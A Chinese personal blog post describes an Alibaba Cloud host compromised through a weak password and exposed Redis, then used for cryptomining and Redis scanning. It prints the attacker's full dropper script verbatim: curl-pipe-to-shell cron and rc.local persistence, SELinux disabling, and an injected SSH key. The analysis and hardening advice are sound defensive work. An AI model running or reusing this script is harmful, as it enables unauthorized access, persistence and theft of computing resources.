黑客入侵阿里云主机挖矿以及利用redis漏洞扫描抓取肉鸡

本文摘要:本人前几天购买了阿里云主机,并安装了redis,第二天早上阿里云客服打电话过来询问我在ECS上做什么,为毛CPU的使用率一直都是满的,我说我才买的啊,就装了俩软件,现在还在装呢,
        本人前几天购买了阿里云主机,并安装了redis,第二天早上阿里云客服打电话过来询问我在ECS上做什么,为毛CPU的使用率一直都是满的,我说我才买的啊,就装了俩软件,现在还在装呢,客服说我可能是装软件导致的这个问题,让我注意一下,如果长期CPU满负荷,可能给我宕机,资源数据不保。
 
        挂了电话后我就登上了阿里云账号,看了一下自己Mem和CPU的使用状况,Mem倒没撒,CPU确实一直是一条直线,一直是百分之百。后来我就看了ps -aux看了进程cpu和内存占用情况,发现了以下:
 
 
 
第一条红线,cpu使用率竟然达到了98%,切换到了这个目录下,发现了还有一个可执行文件叫做gpg-agent,我百度了以下这个玩意,貌似用来加密进行远程登录的,但是进程里的这玩意多了个d,我顿时敏锐的感觉到了这可能是一个病毒,一直占着我的CPU,我把它禁掉了之后,CPU使用开始直线式下落直到水平。
 
        然而,过了好几分钟后,我又一次ps -aux,竟然又看到了它,我在想怎么干不掉啊,然后看到了进程里面老是出现http://img.namunil.com/什么的,我看一下这个ip:
 
 
 
 
 
        这个ip竟然是特喵的葡萄牙的。。。。也就是说我的机子可能被植入了恶意脚本,下载了那么个玩意儿,我把这个进程杀死了,把这个二进制的可执行文件给删除了,它还是会继续下载,继续执行。
 
        想想为什么会这样,原来linux里有一个自动执行的软件crontab,在/etc/下面,里面有一行curl -fsSL http://img.namunil.com/ash.h | bash,也就是说自动执行这句话,从这个url下载东西然后当成shell执行,我尝试着curl了这个东西,发现代码如下:
 
PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin
HISTSIZE=1
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron 2>/dev/null
crontab -l 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/25 * * * * curl -fsSL http://img.namunil.com/ash.php | sh' > /var/spool/cron/root
echo '*/30 * * * * curl -fsSL http://img.namunil.com/ash.php | sh' > /var/spool/cron/crontabs/root
echo 'curl -fsSL http://img.namunil.com/ash.php | sh' > /etc/rc.local
echo 'exit 0' >> /etc/rc.local
yum install -y bash 2>/dev/null
apt install -y bash apt-get 2>/dev/null
apt-get install -y bash 2>/dev/null
 
bash -c 'curl -fsSL http://img.namunil.com/bsh.php | bash' 2>/dev/null
 
        终于真相露出了水面,这段代码显示关闭了我的selinux,然后又在我的本地添加了对方的私钥,试图想免密远程登录我的ECS,用心良苦啊。。。然后又继续下载了bsh.php脚本,然后下载那个agentd恶意二进制可执行文件,那个可执行文件就是用来挖矿的,也就是图一耗费了百分之98的CPU。
 
        当控制了我的ECS挖矿后,然后又用masscan 扫描远程主机的6379-6381的端口,这些远程主机的ip段为79.191.0.0/16等等(如图一第二条红线),利用了redis的6379端口没有授权,进而扫描然后再把自己的公钥写入,也就是寻找肉鸡。
 
        然而一开始它是怎么登上我的主机上传脚本的呢。回想了一下,因为我买主机的时候设置了一个小白密码(我的名字首字母加生日),估计是被别人 暴力破解了。
 
        解决方案:更改ssh登录端口,更改redis端口,将ssh登录密码设置成高级的(字母大小写数字标点,尽量长一下),就此解决问题。

热门推荐

更多